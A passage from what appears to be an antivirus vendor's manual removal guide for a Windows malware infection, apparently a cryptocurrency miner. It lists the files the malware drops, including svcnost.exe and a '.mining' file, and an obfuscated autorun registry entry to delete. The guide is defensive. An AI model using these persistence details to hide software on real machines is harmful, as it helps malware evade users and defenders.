    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\Ux (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\F (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\10[1].htm (879 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\32_2[1].mining (283058 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\RlyfP7 (306 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\options (152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\yfR (226 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\lRfy (36 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\lel.arch (235493 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\fylRx (226 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\svcnost.exe (269510 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\VZaqC (879 bytes)
    C:\551b45c5a2e3ajn57690b0469d26f1a3\mic.exe (24537 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\isgsg.dll (35 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\ISDone.dll (3681 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\_isetup\_shfoldr.dll (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\BASS.dll (601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\CallbackCtrl.dll (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-TV3I5.tmp\setup.tmp (50 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "yRF" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe /yfRlFxP79ACugWTUxUTlVaBNuyoJcpZUyMkebi17VoZjaPqHCA4cxDScRhqpiAG"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
